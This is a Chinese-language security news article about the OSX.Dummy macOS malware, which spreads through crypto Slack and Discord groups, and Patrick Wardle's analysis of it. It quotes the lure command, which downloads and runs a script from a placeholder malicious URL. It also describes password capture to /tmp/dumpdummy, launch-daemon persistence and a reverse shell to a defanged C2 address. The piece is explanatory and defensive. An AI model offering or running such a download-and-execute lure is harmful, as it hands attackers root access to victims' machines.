OSX Dummy新型Mac恶意软件

  • A+
所属分类:网络安全新闻

前NSA白帽黑客和恶意软件研究员Patrick Wardle分析了一款名为OSX.Dummy的新型mac恶意软件,其目标是加密货币社区。
在安全研究员Remco Verhoef(@remco_verhoef)向SANS的“InfoSec处理程序日记博客”发布了一篇名为“ 加密MacOS恶意软件的社区目标 ”的有趣条目后,受欢迎的专家决定分析恶意代码。
“ 以前我们看到过多次MacOS恶意软件攻击,通过冒充管理员或关键人员发起加密相关的Slack或Discord聊天组。小片段正在共享,导致下载和执行恶意二进制文件。“Verhoef写道。

Wardle的意图是证明Objective-See的工具可以一般地阻止这种新的威胁,即使它没有被所有的反病毒软件检测到。

  1. $ cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

注意到,攻击是 通过冒充管理员或关键人员发起的,与密码相关的Slack或Discord聊天组内。

攻击者共享小代码片段,如下所示,导致下载和执行恶意二进制文件。

OSX Dummy新型Mac恶意软件

Wardle注意到恶意二进制文件没有签名,这意味着它会被GateKeeper阻止,但攻击者通过让受害者直接通过终端命令下载和运行二进制文件来淹没这种限制。

Wardle使用安装了各种Objective-See工具的High Sierra虚拟机对恶意软件进行了动态分析。

恶意软件首先将脚本设置为root

那么它通过执行sudo命令将文件的权限更改为root ,但这将要求用户在终端中输入密码。

恶意代码将密码保存在文件夹/ tmp / dumpdummy中;

恶意软件进行一系列操作,通过恶意启动守护进程获得持久性。

恶意软件将RunAtLoad键设置为true,这意味着程序键/var/root/script.sh的值将在操作系统重新启动时自动执行。

该脚本将尝试连接到端口1337上的185 [。] 243.115.230。
“然后在使用 -i 标志执行/ bin / sh之前,将stdin,stdout和stderr 复制到套接字。换句话说,它建立了一个交互式的反向外壳。“ 沃德尔解释道。

“如果您安装了防火墙产品,例如Objective-See的 LuLu,则会检测到该网络活动”

如果恶意软件成功连接C&C服务器(
185[.]243.115.230:1337
),攻击者将能够在目标系统上以root身份任意执行命令。

在OSX.Dummy的Wardle分析的主要发现之下:

感染方法是愚蠢的
二进制文件的庞大规模是愚蠢的
持久性机制是蹩脚的(因此也是愚蠢的)
能力是相当有限的(因此相当愚蠢)
在每一步(愚蠢)检测都是微不足道的
...最后,恶意软件将用户的密码保存到
dumpdummy
“要检查你感染运行 KnockKnock 为根(因为恶意软件集的它的组件是只为root可读)

CE安全网

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: